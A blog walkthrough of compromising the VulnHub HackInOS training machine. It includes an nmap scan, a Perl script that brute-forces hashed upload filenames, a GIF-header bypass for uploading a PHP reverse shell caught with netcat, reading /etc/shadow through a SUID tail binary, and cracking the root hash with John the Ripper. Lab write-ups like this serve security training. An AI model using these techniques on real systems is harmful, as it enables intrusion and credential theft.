Monday, October 14, 2019

VulnHub: HackInOS Walkthrough

Lets start off with a nmap scan of the remote host. 

root@ubuntu:~# nmap -sS -sV -sC -O -T5 -Pn 192.168.0.35

Starting Nmap 7.60 ( https://nmap.org ) at 2019-10-14 16:37 MDT
Nmap scan report for 192.168.0.35
Host is up (0.00060s latency).
Not shown: 998 closed ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 d9:c1:5c:20:9a:77:54:f8:a3:41:18:92:1b:1e:e5:35 (RSA)
|   256 df:d4:f2:61:89:61:ac:e0:ee:3b:5d:07:0d:3f:0c:87 (ECDSA)
|_  256 8b:e4:45:ab:af:c8:0e:7e:2a:e4:47:e7:52:f9:bc:71 (EdDSA)
8000/tcp open  http    Apache httpd 2.4.25 ((Debian))
|_http-generator: WordPress 5.0.3
|_http-open-proxy: Proxy might be redirecting requests
| http-robots.txt: 2 disallowed entries 
|_/upload.php /uploads
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Blog – Just another WordPress site
MAC Address: 08:00:27:20:A9:BC (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 21.35 seconds
root@ubuntu:~#

We get some interesting results back from nmap. First its running a httpd on port 8000 and looks like a wordpress default site. Lets check out robots.txt and see what it says. 

http://192.168.0.35:8000/robots.txt

User-agent:*
Disallow:/upload.php
Disallow:/uploads

We get a 403 forbidden on the upload directory but we can access the upload.php page. If we view-source on the uploads page we find a hint. 

https://github.com/fatihhcelik/Vulnerable-Machine---Hint/blob/master/upload.php

It seems to be the source code of uploads.php and we can see that there are some vulnerabities in the script. The first thing that sticks out in this code is the md5 function. 

$rand_number = rand(1,100);
$target_dir = "uploads/";
$target_file = $target_dir . md5(basename($_FILES["file"]["name"].$rand_number));
$file_name = $target_dir . basename($_FILES["file"]["name"]);

It gets the name of the file and appends a random number between 1 and 100 to the end of the file and the hashes the resulting file name to a md5 hash. We can write a script to brute force the resulting filename in perl as below. 

#!/usr/bin/env perl
use strict;
use warnings;
use Digest::MD5 qw(md5 md5_hex md5_base64);
use LWP::UserAgent;

my @files;
my $host = "http://192.168.0.35:8000";
my $file = "php-reverse-shell.php";

my $ua = LWP::UserAgent->new(timeout => 10);

push(@files,md5_hex($file.$_).".php") for (0..100);

foreach my $file (@files) {

    my $res = $ua->get($host."/uploads/".$file);

    if ($res->status_line =~ m/(\d+)\s(.*)/g) {
        if ($1 =~ m/200/) {
            print "[+] Page Found (200) OK: $host/uploads/$file\n";
     }
 }
}

Next is the file type check. It has a weak way of checking if the file being uploaded is really an image or something else. This can be bypassed by prepending a GIF89; before our shell code to pass the check on the server which should allow us to upload our remote file. For the shell I chose a connect back shell from pentestmonkey.net 

if($check["mime"] == "image/png" || $check["mime"] == "image/gif")

Now we can try to upload the file and see if we can brute force the correct file name with our script we wrote eailer. Once uploaded, we run the script and get a successful connect back of the remote system to our machine. 

root@ubuntu:~# nc -v -l -p 4444
Listening on [0.0.0.0] (family 0, port 4444)
Connection from 192.168.0.35 54446 received!
Linux 1afdd1f6b82c 4.15.0-29-generic #31~16.04.1-Ubuntu SMP Wed Jul 18 08:54:04 UTC 2018 x86_64 GNU/Linux
 23:37:18 up  1:02,  0 users,  load average: 0.08, 0.04, 0.01
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$

We check /etc/passwd for any additional users on the system that might be of some intrest to us. 

www-data@1afdd1f6b82c:/home$ cat /etc/passwd
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/bin/false
www-data@1afdd1f6b82c:/home$

We dont find any other users on the system that can login so we will search for SUID binaries next. 

www-data@1afdd1f6b82c:/home$ find / -xdev -perm -4000 -type f 2>/dev/null
find / -xdev -perm -4000 -type f 2>/dev/null
/usr/bin/chsh
/usr/bin/gpasswd
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/tail
/usr/bin/chfn
/bin/mount
/bin/umount
/bin/su
www-data@1afdd1f6b82c:/home$

We see the tail utility is SUID able. This means we can read the /etc/shadow file and extract the hashed password of root to crack. 

www-data@1afdd1f6b82c:/home$ tail -n25 /etc/shadow
tail -n25 /etc/shadow
root:$6$qoj6/JJi$FQe/BZlfZV9VX8m0i25Suih5vi1S//OVNpd.PvEVYcL1bWSrF3XTVTF91n60yUuUMUcP65EgT8HfjLyjGHova/:17951:0:99999:7:::
daemon:*:17931:0:99999:7:::
bin:*:17931:0:99999:7:::
sys:*:17931:0:99999:7:::
sync:*:17931:0:99999:7:::
games:*:17931:0:99999:7:::
man:*:17931:0:99999:7:::
lp:*:17931:0:99999:7:::
mail:*:17931:0:99999:7:::
news:*:17931:0:99999:7:::
uucp:*:17931:0:99999:7:::
proxy:*:17931:0:99999:7:::
www-data:*:17931:0:99999:7:::
backup:*:17931:0:99999:7:::
list:*:17931:0:99999:7:::
irc:*:17931:0:99999:7:::
gnats:*:17931:0:99999:7:::
nobody:*:17931:0:99999:7:::
_apt:*:17931:0:99999:7:::
www-data@1afdd1f6b82c:/home$

Once we have the has we go ahead and fire up JohnTheRipper and start cracking. 

root@ubuntu:~/src/JohnTheRipper/run# ./john --wordlist=/home/sam/wordlists/rockyou.txt /home/sam/hackinos.txt 
Using default input encoding: UTF-8
Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 256/256 AVX2 4x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
john             (root)
1g 0:00:00:03 DONE (2019-10-14 17:46) 0.2702g/s 1798p/s 1798c/s 1798C/s honeybear..98765432
Use the "--show" option to display all of the cracked passwords reliably
Session completed
root@ubuntu:~/src/JohnTheRipper/run#

Cracking didnt take to long the password being john was really easy to guess. So lets try to su to root from our shell we have on www-data. 

www-data@1afdd1f6b82c:/home$ su root
su root
Password: john

root@1afdd1f6b82c:/home# id
id
uid=0(root) gid=0(root) groups=0(root)
root@1afdd1f6b82c:/home# whoami
whoami
root
root@1afdd1f6b82c:/home#

Success! Now lets look for some flags maybe contained in the /root directory of the host. 

root@1afdd1f6b82c:/home# cd /root
cd /root
root@1afdd1f6b82c:~# ls -la
ls -la
total 36
drwx------ 1 root root 4096 Mar  1  2019 .
drwxr-xr-x 1 root root 4096 Feb 23  2019 ..
-rw------- 1 root root   57 Mar  1  2019 .bash_history
-rw-r--r-- 1 root root  570 Jan 31  2010 .bashrc
drwxr-xr-x 2 root root 4096 Feb 24  2019 .nano
-rw-rw-rw- 1 root root   28 Feb 28  2019 .port
-rw-r--r-- 1 root root  148 Aug 17  2015 .profile
-rw-r--r-- 1 root root  169 Feb  9  2019 .wget-hsts
-rw-r--r-- 1 root root   27 Feb 28  2019 flag
root@1afdd1f6b82c:~# cat flag
cat flag
Life consists of details..
root@1afdd1f6b82c:~#
at

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)

Exploiting Weak WEBDAV Configurations

The server we are going to audit has the following fingerprint. 80/tcp open http Apache httpd 2.2.8 ((Ubuntu) DAV/2) Next we need t...

  • Exploring POP3 Servers
    Scanning the remote host We can use NMAP to scan the remote host and run enumeration scripts against the POP3 server. root@asus:~/unix% ...
  • Enumerating SMTP Servers with NMAP
    NMAP gives you the ability to enumerate SMTP service with some scripts from the NMAP Scripting Enigne. These scripts will produce some gene...
  • Enumerating SNMP Servers with NMAP
    NMAP gives you the ability to use scripts to enumerate and exploit remote host with the use of the NMAP Scripting Engine. Today we will be ...
  • Testing LDAP servers with examples
    Today we are going to be attacking the remote service LDAP. The only thing we need is an IP Address so lets ping our host to verify its up ...
  • Enumerating UNIX usernames
    Sometimes you may come across a situation where all you have from your OSINT phase is a list of first and last names. you can use pre-built...
  • Reading local files with XXE attacks
    Today we will be exploring XXE XML External Entity Attacks. A XXE attack is a attack that is brought against an application that deals with...
  • Attacking SMTP on Debian Linux
    First lets do a quick service scan against the remote host. root@asus:/mnt% nmap -sV -T4 -p22,25 mail.acme.com Starting Nmap 7.01 ( https:...
  • Attacking NFS
    This is our data set we will work from which was gathered during the OSINT phase from the company website: http://www.acme.com k.madden@m...
  • VulnHub: RickdiculouslyEasy Walkthrough
    Lets first start off with a nmap scan of the remote host. root@ubuntu:~# nmap -p0-65355 -sV -O -sC -T5 192.168.0.48 Starting Nmap 7.60 (...
  • Exploring IMAP Servers
    Scanning the Remote Host We can use NMAP to scan the remote IMAP server and run enumeration scripts agaisnt it to see what all the server i...